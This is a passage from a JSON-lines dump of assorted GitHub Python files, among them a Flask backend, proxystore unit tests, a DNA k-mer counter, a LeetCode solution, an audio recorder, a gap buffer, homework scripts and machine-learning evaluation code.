jsonify({'msg': 'Electronic updated'})\n\n@app.route('/electronics/result', methods=['POST'])\ndef createTask():\n global name_reviewer\n name_reviewer = request.get_json(force=True)['taskName']\n return jsonify(name_reviewer)\n\n@app.route('/electronics/result', methods=['GET'])\ndef getresultTask():\n global name_reviewer\n result = []\n if name_reviewer != \"\":\n for index in db.aggregate([\n {\"$match\": {\"reviewerName\": name_reviewer}},\n {\"$group\": {\"_id\": \"$reviewerID\", \"count\": {\"$sum\":1}}}\n ]):\n result.append(index)\n name_reviewer = \"\"\n else:\n result = [{\"_id\": \"None\", \"count\": 0}]\n return jsonify(result)\n\n# Estableciendo el debug\nif __name__ == \"__main__\":\n app.run(debug=True)","repo_name":"maalloor/DistributedSystems-Project","sub_path":"Backend/src/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":6285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41867853326","text":"from __future__ import annotations\n\nimport uuid\nfrom unittest import mock\n\nimport websockets\n\nfrom proxystore.p2p.relay.authenticate import GlobusUser\nfrom proxystore.p2p.relay.manager import Client\nfrom proxystore.p2p.relay.manager import ClientManager\n\n\ndef mock_websocket() -> websockets.server.WebSocketServerProtocol:\n with mock.patch('websockets.server.WebSocketServerProtocol'):\n return websockets.server.WebSocketServerProtocol() # type: ignore[call-arg]\n\n\ndef generate_client() -> Client[GlobusUser]:\n return Client(\n name='name',\n uuid=uuid.uuid4(),\n user=GlobusUser('username', uuid.uuid4()),\n websocket=mock_websocket(),\n )\n\n\ndef test_client_equality() -> None:\n assert generate_client() != generate_client()\n\n client1 = generate_client()\n client2 = Client(\n name='other-name',\n uuid=client1.uuid,\n user=client1.user,\n websocket=mock_websocket(),\n )\n assert client1 == client2\n\n assert client1 != object\n\n\ndef test_client_repr() -> None:\n assert isinstance(repr(generate_client()), str)\n\n\ndef test_client_manager() -> None:\n manager: ClientManager[GlobusUser] = ClientManager()\n\n # Test operations on empty manager\n assert len(manager.get_clients()) == 0\n assert manager.get_client_by_uuid(uuid.uuid4()) is None\n assert manager.get_client_by_websocket(mock_websocket()) is None\n\n # Basic add / get client\n client = generate_client()\n manager.add_client(client)\n assert len(manager.get_clients()) == 1\n assert manager.get_client_by_uuid(client.uuid) is client\n assert manager.get_client_by_websocket(client.websocket) is client\n\n # Remove a client + remove an already removed client\n manager.remove_client(client)\n assert len(manager.get_clients()) == 0\n manager.remove_client(client)\n\n # Add many clients\n count = 5\n for _ in range(count):\n manager.add_client(generate_client())\n assert len(manager.get_clients()) == count\n","repo_name":"proxystore/proxystore","sub_path":"tests/p2p/relay/manager_test.py","file_name":"manager_test.py","file_ext":"py","file_size_in_byte":1993,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"70088188713","text":"sequence = input(\"What is the genomic sequence? \")\nk = int(input(\"What is the length k of each kmer? \"))\nL = int(input(\"What is the length of clump L? \"))\nt = int(input(\"What is the minimum times t? \"))\n\nDNA = str(sequence.upper())\n\n# Count the number of each kmer\n# Produce dictionary with (kmer, number of times) pairs in counts\n\ncounts = {}\n\nfor i in range(0, len(DNA) - k + 1):\n\tkmer = DNA[i:i + k]\n\tif kmer in counts:\n\t\tcounts[kmer] += 1\n\telse:\n\t\tcounts[kmer] = 1\n\n# print(counts)\n# print(counts.values())\n\n# Eliminate all pairs that appear less than t times; new dict called frequent\n\nfrequent = {}\n\nfor k in counts:\n\tif counts[k] >= t:\n\t\tfrequent[k] = counts[k]\n\nanswer = frequent.keys()\noutput = ' '.join(answer)\nprint(output)","repo_name":"edaaydinea/Bioinformatics-Specialization","sub_path":"Finding Hidden Messages in DNA (Bioinformatics I)/Week 1/ClumpFinding.py","file_name":"ClumpFinding.py","file_ext":"py","file_size_in_byte":734,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"21474758709","text":"class Solution:\n def shortestCommonSupersequence(self, str1: str, str2: str) -> str:\n # 0 -> up, 1 -> left, 2 -> diagonal\n f = [[len(str1) + len(str2) for j in range(len(str2) + 1)] for i in range(len(str1) + 1)]\n ans = [[-1 for j in range(len(str2) + 1)] for i in range(len(str1) + 1)]\n for i in range(len(str1) + 1):\n f[i][0] = i\n if i != 0: ans[i][0] = 0\n for j in range(len(str2) + 1):\n f[0][j] = j\n if j != 0: ans[0][j] = 1\n\n for i in range(1, len(str1) + 1):\n for j in range(1, len(str2) + 1):\n if str1[i-1] == str2[j-1]:\n f[i][j] = f[i-1][j-1] + 1\n ans[i][j] = 2\n if f[i-1][j] + 1 < f[i][j]:\n f[i][j] = f[i-1][j] + 1\n ans[i][j] = 0\n if f[i][j-1] + 1 < f[i][j]:\n f[i][j] = f[i][j-1] + 1\n ans[i][j] = 1\n\n ansStr = \"\"\n i, j = len(str1), len(str2)\n while ans[i][j] != -1:\n c = \"\"\n if ans[i][j] == 0:\n c = str1[i-1]\n i -= 1\n elif ans[i][j] == 1:\n c = str2[j-1]\n j -= 1\n else:\n c = str1[i-1]\n i -= 1\n j -= 1\n ansStr = c + ansStr\n return ansStr\n \n","repo_name":"notruilin/LeetCode","sub_path":"1092. Shortest Common Supersequence/shortestCommonSupersequence.py","file_name":"shortestCommonSupersequence.py","file_ext":"py","file_size_in_byte":1402,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"72044681832","text":"import pyaudio\nimport numpy as np\nimport wave\nimport os\n\nclass AudioProcessing():\n def __init__(self):\n self.FORMAT= pyaudio.paInt16\n self.CHUNK = 1024\n self.RATE = 44100\n self.CHANNEL = 1\n self.frames=[]\n self.sample = np.zeros([102400])\n self.freq = np.fft.rfftfreq(1024, 1 / self.RATE)\n self.spec = np.zeros([1024], dtype=complex)\n self.pa = pyaudio.PyAudio()\n self.openRecordStream(0)\n self.play_data = None\n\n def openRecordStream(self, deviceidx):\n self.stream = self.pa.open(format=self.FORMAT,\n channels=self.CHANNEL,\n rate=self.RATE,\n input=True,\n output=True,\n input_device_index=deviceidx,\n stream_callback=self.recordCallback)\n print(self.pa.get_device_info_by_index((deviceidx)))\n\n\n def closeStream(self):\n self.stream.close()\n del self.stream\n\n def recordCallback(self, in_data, frame_count, time_info, flag):\n self.frames.append(in_data)\n in_data = np.fromstring(in_data, np.int16)\n for i in np.arange(99, 0, -1):\n self.sample[i*1024 : (i+1) * 1024] = self.sample[(i-1) * 1024 : i*1024] # chunk만큼 뒤로 당기고\n self.sample[0:1024] = in_data # 새로운 CHUNK를 맨앞에 입력함\n # fft\n self.spec = np.fft.rfft(self.sample[0:1024])\n return (in_data, pyaudio.paContinue)\n\n def start_stream(self):\n self.frames=[]\n self.stream.start_stream()\n return self\n\n\n def stop_stream(self):\n self.stream.stop_stream()\n wf = wave.open('temp/temp.wav', 'wb')\n wf.setnchannels(self.CHANNEL)\n wf.setsampwidth(self.pa.get_sample_size(self.FORMAT))\n wf.setframerate(self.RATE)\n wf.writeframes(b''.join(self.frames))\n wf.close()\n print('recording is done......')\n return self\n\n def openPlayStream(self, format, channels, rate, callback=None):\n #self.playwf = wave.open('temp.wav', 'rb')\n pa = pyaudio.PyAudio()\n playable_stream = pa.open(format=pa.get_format_from_width(format),\n channels=channels,\n rate=rate,\n output=True,\n stream_callback=callback)\n return playable_stream\n\n # 문제있음\n '''\n def playCallback(self, in_data, frame_count, time_info, status):\n self.play_data = self.playwf.readframes(frame_count)\n\n if self.play_data==b'':\n self.playwf.close()\n else:\n data = np.fromstring(self.play_data, np.int16)\n self.sample[0:1024] = data\n self.spec = np.fft.rfft(self.sample[0:1024])\n\n return (self.play_data, pyaudio.paContinue)\n\n '''\n def deleteWav(self):\n if os.path.exists('temp/temp.wav'):\n os.remove('temp/temp.wav')\n else:\n print('cannot found \"temp.wav\"')\n\n\n# test\nif __name__ == '__main__':\n pa = pyaudio.PyAudio()\n\n devicelst = []\n for idx in range(pa.get_device_count()):\n devicelst.append(pa.get_device_info_by_index(idx))\n\n for info in devicelst:\n if info['maxInputChannels'] != 0 and info['hostApi'] == 0:\n print(info)\n\n #ap = AudioProcessing()\n #ap.openRecordStream()\n #ap.start_stream()\n #time.sleep(5)\n #ap.stop_stream()\n #ap.stream.close()\n","repo_name":"aod1310/classical_music_auto_composition","sub_path":"AudioProcessing.py","file_name":"AudioProcessing.py","file_ext":"py","file_size_in_byte":3591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16572908893","text":"from enum import Enum\n\n\nclass CellType(Enum):\n GAP = 1\n ENDFILE = 2\n\n\nclass GapBuffor:\n def __init__(self):\n self.gap_size = 16\n self.buffor = [CellType.GAP] * self.gap_size\n self.current_gap_size = self.gap_size\n self.cursor = 0\n\n def write(self, text: str) -> None:\n for ch in text:\n self.buffor[self.cursor] = ch\n self.cursor += 1\n self.current_gap_size -= 1\n\n if self.current_gap_size <= 0:\n last_index = len(self.buffor) - 1\n self.current_gap_size = self.gap_size\n self.buffor += [CellType.GAP] * self.gap_size\n for i in range((last_index + 1) - self.cursor):\n start = last_index - i\n end = last_index + self.gap_size - i\n self.buffor[start], self.buffor[end] = self.buffor[end], self.buffor[start]\n\n def move_cursor(self, x: int) -> None:\n if x == 0:\n return\n elif x > 0:\n missed_space = self.cursor + self.current_gap_size + x - len(self.buffor)\n if missed_space > 0:\n return\n start = self.cursor\n end = self.cursor + self.current_gap_size\n for _ in range(x):\n self.buffor[start] = self.buffor[end]\n self.buffor[end] = CellType.GAP\n start += 1\n end += 1\n self.cursor += x\n else:\n start = self.cursor - 1\n end = self.cursor + self.current_gap_size - 1\n for _ in range(-x):\n if self.cursor <= 0:\n break\n self.cursor -= 1\n self.buffor[end] = self.buffor[start]\n self.buffor[start] = CellType.GAP\n start -= 1\n end -= 1\n\n def delete(self, amount: int) -> None:\n if amount > 0:\n self.buffor = self.buffor[:max(self.cursor - amount, 0)] + self.buffor[self.cursor:]\n self.cursor -= amount\n if self.cursor < 0:\n self.cursor = 0\n\n def get_char(self, index: int) -> None:\n if index == len(self.buffor):\n return CellType.ENDFILE\n return self.buffor[index]\n\n def clear(self) -> None:\n self.buffor.clear()\n self.buffor = [CellType.GAP] * self.gap_size\n self.current_gap_size = self.gap_size\n self.cursor = 0\n\n def load(self, data: str) -> None:\n self.clear()\n self.buffor += list(data)\n\n def get_text(self) -> str:\n res = ''\n for cell in self.buffor:\n if type(cell) == str:\n res += cell\n return res\n","repo_name":"dixtel/gapbuffer","sub_path":"gapbuffer.py","file_name":"gapbuffer.py","file_ext":"py","file_size_in_byte":2702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14142413200","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nProgramming 4 Template\r\n\r\nRefer to the instructions on Canvas for more information.\r\n\r\n\"I have neither given nor received help on this assignment.\"\r\nauthor: Inhan Park\r\n\"\"\"\r\n__version__ = 1\r\n\r\ndef extraEnd(string): \r\n '''\r\n Given a string, return a new string made of 3 copies of the last 2 characters of the \r\n original string. The original string's length will be at least 2.\r\n '''\r\n temp = string[-2:]\r\n temp = temp + temp + temp\r\n return temp\r\n\r\n\r\n\r\ndef without2(string):\r\n '''\r\n\tGiven a string, if the same 2-character substring appears at both its beginning and \r\n end, return the contents of the string without the 2-character substring at the beginning. \r\n For example, \"HelloHe\" yields \"lloHe\". Note that the 2-character substring at the \r\n beginning may overlap with the one at the end, so \"Hi\" yields \"\". If the two characters \r\n at the start and end of the string do not match each other, return the original string \r\n unchanged.\r\n\t'''\r\n if string[:2] == string[-2:]:\r\n return string[2:]\r\n return string\r\n\r\n\r\n######################################################################################\r\n\r\ndef main():\r\n # You can test your solutions by calling them from here\r\n assert extraEnd(\"example\") == 'lelele', \"return 3 copies of the last 2 characters of the original string\"\r\n assert without2(\"HelloHe\") == 'lloHe', 'remove 2-character substring at beginning if same with 2-character at end'\r\n assert without2('lloHe') == 'lloHe', 'return original string if 2-character substring at begninning and end not match'\r\n \r\nif __name__ == \"__main__\":\r\n main() ","repo_name":"inhanp/Python_program","sub_path":"programming/programming04.py","file_name":"programming04.py","file_ext":"py","file_size_in_byte":1672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7932064084","text":"import pandas as pd\nimport scipy as sp\nimport matplotlib.pyplot as plt\nfrom io import StringIO\nimport numpy as np\nfrom scipy.interpolate import interp1d\nfrom derivativesfedrick_hw6 import *\nfrom integrationfedrick_hw6 import *\nfrom nonlinequationfedrick_hw6 import *\n#function for relaxation method rearranged\ndef f(X):\n a=1\n b=2\n x=X[0]\n y=X[1]\n A=[]\n for l in X:\n A.append(0)\n A[0]=((b/y)-a)**0.5\n A[1]=x/(a + x**2)\n #X[1]=((a+b**2)/b)*(y**2)\n#function for newton raphson method\ndef f1(X):\n a=1\n b=2\n x=X[0]\n y=X[1]\n A=[]\n for l in X:\n A.append(0)\n A[0]=((b/y)-a)**0.5-x\n A[1]=x/(a + x**2)-y\n #X[1]=((a+b**2)/b)*(y**2)\n return A\n#computes the jacobian matrix for the newton raphson system\ndef J(X):\n a=16\n b=2\n x=X[0]\n y=X[1]\n f1dxa=2*(x**3)*y+2*x*y*(a+x**2)\n f1dxb=(y*(a+x**2))**2\n #f1dx=(f1dxa/f1dxb)-1\n f1dx=-1\n #f1dy=(-(x**2))/((y**2)*(a+x**2))\n f1dy=0\n row1=[f1dx,f1dy]\n #f2dx=(2*x*(y**2))/b\n f2dx=((a+x**2)-(2*x**2))/((a+x**2)**2)\n #f2dy=2*((a+x**2)/b)*y-1\n f2dy=-1\n row2=[f2dx,f2dy]\n j=np.array([row1,row2])\n return j\n#output interation and results\nr,ri=relax([-100,100],f, 1e-6)\nnr, nri=NRsys(f1,J,1e-6,[-100,100])\n\nprint(\"this is the solution using relaxation: \"+ str(np.array(r).real)+\" with \"+str(ri)+\" iterations\")\nprint(\"this is the solution using newton raphson: \"+ str(np.array(nr).real)+\" with \"+str(nri)+\" iterations\")\n","repo_name":"sfedrick/computationphysics","sub_path":"homework6/6_12fedrick_hw6.py","file_name":"6_12fedrick_hw6.py","file_ext":"py","file_size_in_byte":1464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7243607096","text":"# A quick function to capture the masses of each component in an OpenRocket .rkt model\r\n# and to produce a mass breakdown\r\n\r\nfrom prettytable import PrettyTable as pt\r\nimport csv\r\n\r\n\r\ndef massBreakdown(path, boosters, propellant):\r\n components = [\"Boosters\", \"Propellant\"]\r\n masses = [boosters, propellant]\r\n raw = []\r\n\r\n with open(path, 'r') as f: # (Sporadic_Impulse1.rkt)\r\n\r\n for i in range(0, 2000, 2):\r\n data = f.readline()\r\n if data == '':\r\n break\r\n raw.append(data.lstrip())\r\n\r\n for j in range(5, len(raw)): # 5 is to prevent 'rocket' appearing as a component\r\n if raw[j].startswith(''):\r\n masses.append(float(raw[j][11:-13])/1000)\r\n if raw[j].startswith(''):\r\n components.append(raw[j][6:-8])\r\n\r\n x = pt()\r\n x.field_names = [\"Components\", \"Masses\"]\r\n\r\n with open(\"massBreakdown.csv\", \"w+\") as out:\r\n\r\n out_writer = csv.writer(out, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\r\n out_writer.writerow(['Component', 'Mass'])\r\n\r\n for i in range(0, len(masses)):\r\n x.add_row([components[i], masses[i]])\r\n out_writer.writerow([components[i], masses[i]])\r\n\r\n print(x)\r\n\r\n\r\n# Call\r\n\r\npath = input(\"Enter file path for .rkt model: \")\r\nb = float(input(\"Enter booster mass (kg): \"))\r\np = float(input(\"Enter the propellant mass (kg): \")) # Model the dry engine mass in an inner tube\r\n\r\nmassBreakdown(path, b, p)\r\n","repo_name":"icl-rocketry/OpenRocket-MassBreakdown","sub_path":"OpenRocketMassBreakdown.py","file_name":"OpenRocketMassBreakdown.py","file_ext":"py","file_size_in_byte":1521,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"15154089919","text":"def main():\r\n a = [[int(s) for s in input().split()] for _ in range(4)]\r\n\r\n if solve(a):\r\n print('CONTINUE')\r\n else:\r\n print('GAMEOVER')\r\n\r\ndef solve(a):\r\n for r in range(4):\r\n for c in range(3):\r\n if a[r][c] == a[r][c+1]:\r\n return True\r\n\r\n for r in range(3):\r\n for c in range(4):\r\n if a[r][c] == a[r+1][c]:\r\n return True\r\n\r\n return False\r\n\r\nmain()","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/arc021/A/4351955.py","file_name":"4351955.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"141412429","text":"import shutil\nimport tempfile\nimport aiohttp.pytest_plugin\n\nimport pytest\n\nfrom load.projects.cloud.loadtesting.tools.logging.storage.src.storage import create_app\n\npytest_plugins = ['aiohttp.pytest_plugin']\ndel aiohttp.pytest_plugin.loop\n\n\n@pytest.fixture\ndef loop(event_loop):\n \"\"\"\n не разбирался как это работает.\n вместе с `del aiohttp.pytest_plugin.loop` стырено отсюда:\n https://a.yandex-team.ru/arc/trunk/arcadia/ads/emily/viewer/backend/tests/conftest.py?rev=r8704789#L23\n но без этого плагин 'aiohttp.pytest_plugin' не завёлся.\n \"\"\"\n return event_loop\n\n\n@pytest.fixture()\ndef dir_path():\n dirpath = tempfile.mkdtemp()\n try:\n yield dirpath\n finally:\n shutil.rmtree(dirpath)\n\n\n@pytest.fixture\nasync def client(aiohttp_client, dir_path):\n return await aiohttp_client(create_app(dir_path))\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"load/tests/conftest (2).py","file_name":"conftest (2).py","file_ext":"py","file_size_in_byte":913,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3191210783","text":"import os\nimport numpy as np\nfrom PIL import Image\nfrom keras.preprocessing.image import load_img, img_to_array\nfrom predict import get_mask\nfrom keras import backend as K\nimport cv2\n\n\ndef iou_loss_core(y_true, y_pred, smooth=1):\n #https://www.kaggle.com/c/data-science-bowl-2018/discussion/51553\n intersection = K.sum(K.abs(y_true * y_pred), axis=-1)\n union = K.sum(y_true,-1) + K.sum(y_pred,-1) - intersection\n iou = (intersection + smooth) / ( union + smooth)\n return iou\n\n\n\ndef query_img_names(path=None, movement_no=None):\n img_names = os.listdir(path)\n wished_names = []\n for img_name in img_names:\n if img_name.endswith('.png'):\n if (movement_no is not None):\n splitted = img_name.split('-')\n index = int(splitted[len(splitted) - 2]) \n if index == movement_no:\n wished_names.append(path + '/' + img_name)\n else:\n wished_names.append(path + '/' + img_name)\n\n return wished_names\n\n\n\ndef measure_jaccard(model, img_names, nth_frame, img_width_height, optical_flow_dir):\n from sklearn.metrics import jaccard_score\n preds = []\n grounds = []\n for i, img_name in enumerate(img_names):\n ground_mask = img_to_array(load_img(img_name, color_mode='grayscale', interpolation='bilinear', target_size=(img_width_height,img_width_height,3)), dtype='uint8')\n ground_mask = ground_mask.flatten()\n rgb_img_name = img_name[:len(img_name) - 14] + '.jpg'\n sample = img_to_array(load_img(rgb_img_name, color_mode='rgb', interpolation='bilinear', target_size=(img_width_height,img_width_height,3)), dtype='uint8')\n x_inp = None\n ########\n if nth_frame > 0:\n x_inp = np.zeros((img_width_height, img_width_height, 5))\n #sample_gray = img_to_array(load_img(rgb_img_name, color_mode='grayscale', interpolation='bilinear', target_size=(img_width_height,img_width_height,3)), dtype='uint8')\n #only_img_name = rgb_img_name.split('/')[2]\n #splitted_name = only_img_name.split('-')\n #next_frame_name = optical_flow_dir + splitted_name[0] + '-' + str(int(splitted_name[1]) + nth_frame) + '-' + splitted_name[2]\n #sample_gray_next = img_to_array(load_img(next_frame_name, color_mode='grayscale', interpolation='bilinear', target_size=(img_width_height,img_width_height,3)), dtype='uint8')\n #flow = cv2.calcOpticalFlowFarneback(sample_gray,sample_gray_next, None, 0.5, 3, 15, 3, 5, 1.2, 0)\n #mag, ang = cv2.cartToPolar(flow[...,0], flow[...,1])\n #ang = ang*180/np.pi/2 # need to be normalized, just like normal rgb hand images. it will be normalized below.\n #mag = cv2.normalize(mag,None,0,255,cv2.NORM_MINMAX) # need to be normalized, just like normal rgb hand images. it will be normalized below.\n # UnetDataset_v4/test/HIJEL_3004 (12)-506-0.jpg\n x_inp[:,:,0:3] = sample \n #print(optical_flow_dir + img_name.split('/')[2][:len(img_name.split('/')[2]) - 14] + '.jpg')\n optical_flow_img = cv2.imread(optical_flow_dir + img_name.split('/')[2][:len(img_name.split('/')[2]) - 14] + '.jpg')\n optical_flow_img_hsv = cv2.cvtColor(optical_flow_img, cv2.COLOR_BGR2HSV) \n x_inp[:,:,3] = optical_flow_img_hsv[:,:,0] \n x_inp[:,:,4] = optical_flow_img_hsv[:,:,2] \n else:\n x_inp = sample\n ######## \n segmented_pred = get_mask(model, x_inp, nth_frame)\n segmented_pred = segmented_pred.flatten()\n \n preds = np.concatenate((np.array(preds), segmented_pred))\n grounds = np.concatenate((np.array(grounds), ground_mask))\n preds = preds / 255 # 0 ve 255 sayilari, 0 ve 1 sayilarina indirgensinki jaccard_score fonksiyonu binary modda calisabilsin\n grounds = np.around(grounds / 255)\n return jaccard_score(y_pred=preds, y_true=grounds)\n\n\n","repo_name":"hizircanbayram/Graduation-Project","sub_path":"UNet/Model/measure_jaccard.py","file_name":"measure_jaccard.py","file_ext":"py","file_size_in_byte":3959,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38915268981","text":"# _*_ coding:utf8 _*_\nimport requests\nimport json\nfrom Myproject.Tools import signature\n\nclass RunMain:\n # 实例初始化\n def __init__(self,headers,u,method,data=None):\n self.res = self.run_main(headers,u,method,data)\n\n # 封装一个get方法\n def send_get(self,headers,u,data):\n res = requests.get(headers=headers,url=u,data=data).json()\n return res\n\n # 封装一个post方法\n def send_post(self,headers,u,data=None):\n res = requests.post(headers=headers,url=u,data=data).json()\n # return json.dumps(res,indent=2,sort_keys=True)\n return res\n\n # 写一个方法,判断是get的话调用get请求,是post的话调用post请求\n def run_main(self,headers,u,method,data=None):\n res = None\n if method == 'get':\n res = self.send_get(headers,u,data)\n else:\n res = self.send_post(headers,u,data)\n return res\n\n\nif __name__ == '__main__':\n param = \"campDateId\" + \"345718657178255935\" + \"classId\" + \"\" + \"groupId\" + \"\" + \"pageNo\" + \"1\" + \"pageSize\" + \"20\" + \"tagType\" + \"\" + \"orderBy\" + \"selfTag\"\n token = 'c673018d7ed9b1f6b96645c9158c9f40'\n S = signature.signature()\n sign = S.s(param,token)\n headers = {\n 'Content-Type': 'application/json;charset=UTF-8',\n 'token': token,\n 'signature':sign\n}\n url = 'https://presmartapi.kakahui.net/knowledge-smart-crm/api/v1/realTimeKanBan/queryHitKeyWordsList'\n data = {\"campDateId\":\"345718657178255935\",\"classId\":\"\",\"groupId\":\"\",\"pageNo\":1,\"pageSize\":20,\"tagType\":\"\",\"orderBy\":\"selfTag\"}\n data = json.dumps(data,ensure_ascii=False).encode('utf8').decode('latin1')\n run = RunMain(headers,url,'get',data)\n# res = RunMain.send_post(data,url)\n# print(res)\n# print(run.res)\n\n u_test = 'http://testsjob.kakahui.net/api/v1/fetchCampController/fetchRealTimeData'\n # data_test = {'type': '1',\n # 'packageId': '353254591846445079',\n # 'proCode': 'WM180F',\n # 'classId': '351404578921033923',\n # 'wechatType': '1',\n # 'scanQr': '1',\n # 'qrCodeType': '0'\n # }\n data_test = {}\n run_test = RunMain(headers, u_test, 'post', data_test)\n print(run_test.res)","repo_name":"youlong533/Myproject","sub_path":"Tools/get_request.py","file_name":"get_request.py","file_ext":"py","file_size_in_byte":2279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"4762254262","text":"import numpy as np\nfrom pprint import pprint\nimport sys\nimport pandas as pd\nfrom classification import Classification\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.svm import LinearSVC\nfrom sklearn.experimental import enable_halving_search_cv\nfrom sklearn.model_selection import HalvingGridSearchCV\nfrom sklearn.metrics import classification_report\nimport joblib\nimport os\nimport json\nfrom classify_all import get_features as gf\nimport datetime\n\n\ndef grid_randfor(X_train, Y_train):\n # Number of trees in random forest\n n_estimators = [int(x) for x in np.linspace(start=200, stop=2000, num=10)]\n # Number of features to consider at every split\n max_features = ['auto', 'sqrt']\n # Maximum number of levels in tree\n max_depth = [int(x) for x in np.linspace(10, 110, num=11)]\n max_depth.append(None)\n # Minimum number of samples required to split a node\n min_samples_split = [2, 5, 10]\n # Minimum number of samples required at each leaf node\n min_samples_leaf = [1, 2, 4]\n # Method of selecting samples for training each tree\n bootstrap = [True, False] # Create the random grid\n random_grid = {'n_estimators': n_estimators,\n 'max_features': max_features,\n 'max_depth': max_depth,\n 'min_samples_split': min_samples_split,\n 'min_samples_leaf': min_samples_leaf,\n 'bootstrap': bootstrap}\n\n pprint(random_grid)\n\n clf = RandomForestClassifier()\n\n halving_cv = HalvingGridSearchCV(\n clf, random_grid, scoring=\"f1_macro\", n_jobs=-1, min_resources=\"exhaust\", factor=3)\n\n halving_cv.fit(X_train, Y_train)\n\n best_estimator = halving_cv.best_estimator_\n best_score = halving_cv.best_score_\n best_params = halving_cv.best_params_\n\n return (best_estimator, best_score, best_params)\n\n\ndef grid_svm(X_train, Y_train):\n param_grid = {\n 'C': np.arange(0.01, 100, 10)\n }\n\n clf = LinearSVC()\n halving_cv = HalvingGridSearchCV(\n clf, param_grid, scoring=\"f1_macro\", n_jobs=-1, min_resources=\"exhaust\", factor=3)\n\n halving_cv.fit(X_train, Y_train)\n\n best_estimator = halving_cv.best_estimator_\n best_score = halving_cv.best_score_\n best_params = halving_cv.best_params_\n\n return (best_estimator, best_score, best_params)\n\n\ndef get_features(domain, normalize=True):\n train_apps = 'features/features_apps_train.csv'\n test_apps = 'features/features_apps_test.csv'\n\n train_filmes = 'features/features_movies_train.csv'\n test_filmes = 'features/features_movies_test.csv'\n\n features_df_train = None\n features_df_test = None\n\n if domain == 'apps':\n features_df_train = pd.read_csv(train_apps, index_col=0)\n features_df_test = pd.read_csv(test_apps, index_col=0)\n columns = features_df_train.columns\n elif domain == 'movies':\n features_df_train = pd.read_csv(train_filmes, index_col=0)\n features_df_test = pd.read_csv(test_filmes, index_col=0)\n columns = features_df_train.columns\n else:\n print(\"Verifique domínio, saindo\")\n exit()\n\n count_class_0, count_class_1 = features_df_train.helpfulness.value_counts()\n df_class_0 = features_df_train[features_df_train['helpfulness'] == 0]\n df_class_1 = features_df_train[features_df_train['helpfulness'] == 1]\n df_class_0_under = df_class_0.sample(count_class_1)\n ##\n # df_class_0_under = df_class_0.sample(limit_test)\n # df_class_1_under = df_class_1.sample(limit_test)\n # df_train_under = pd.concat([df_class_0_under, df_class_1_under], axis=0)\n ##\n df_train_under = pd.concat([df_class_0_under, df_class_1], axis=0)\n\n # df_train_under = pd.read_pickle('train_t.pkl')\n\n count_class_0, count_class_1 = features_df_test.helpfulness.value_counts()\n df_class_0 = features_df_test[features_df_test['helpfulness'] == 0]\n df_class_1 = features_df_test[features_df_test['helpfulness'] == 1]\n df_class_0_under = df_class_0.sample(count_class_1)\n\n df_test_under = pd.concat([df_class_0_under, df_class_1], axis=0)\n\n if normalize:\n X_train = Classification.normalize(df_train_under.iloc[:, 0:-1])\n X_test = Classification.normalize(df_test_under.iloc[:, 0:-1])\n else:\n X_train = df_train_under.iloc[:, 0:-1]\n X_test = df_test_under.iloc[:, 0:-1]\n\n Y_train = df_train_under['helpfulness']\n Y_test = df_test_under['helpfulness']\n\n return X_train, Y_train, X_test, Y_test\n\n\nprint(datetime.datetime.now())\n\ndomain = sys.argv[1]\nmodel_folder = sys.argv[2]\nmethod = sys.argv[3]\nsel_features = sys.argv[4]\n# result_folder = sys.argv[4]\n# sel_features = sys.argv[5]\n\nif sel_features == 'all':\n df_train, df_test = gf(domain)\n X_train = df_train.iloc[:, 0:-1].fillna(0)\n Y_train = df_train['helpfulness']\n X_test = df_test.iloc[:, 0:-1].fillna(0)\n Y_test = df_test['helpfulness']\nelif sel_features == 'hand':\n X_train, Y_train, X_test, Y_test = get_features(domain)\n\nif method == 'rf':\n clf, score, params = grid_randfor(\n X_train, Y_train)\nelif method == 'svm':\n clf, score, params = grid_svm(\n X_train, Y_train)\nelse:\n print(\"Método inválido\")\n exit()\n\ny_pred = clf.predict(X_test)\n\n\nresultado = classification_report(\n Y_test, y_pred, output_dict=True)\n\nwith open(os.sep.join([model_folder, '%s_grid_%s_%s.result' % (method, domain, sel_features)]), 'w') as f:\n json.dump(resultado, f)\n\nwith open(os.sep.join(\n [model_folder, '%s_model_grid_%s_%s.params' % (method, domain, sel_features)]), 'w') as f:\n f.write(str(score)+'\\n')\n f.write(str(params)+'\\n')\n\n\njoblib.dump(clf, os.sep.join(\n [model_folder, '%s_model_grid_%s_%s.model' % (method, domain, sel_features)]))\n\nprint(datetime.datetime.now())\n","repo_name":"RogerFig/features_experiments","sub_path":"grid_search.py","file_name":"grid_search.py","file_ext":"py","file_size_in_byte":5761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13186970924","text":"class Solution:\n def __init__(self):\n pass\n\n def my_solution(self, lst):\n \"\"\"\n slow&fast pointers\n \"\"\"\n if len(lst) < 2:\n return 0\n\n tot = 0\n left_max_arr = [0 for _ in lst]\n right_max_arr = [0 for _ in lst]\n\n left_max = 0\n for 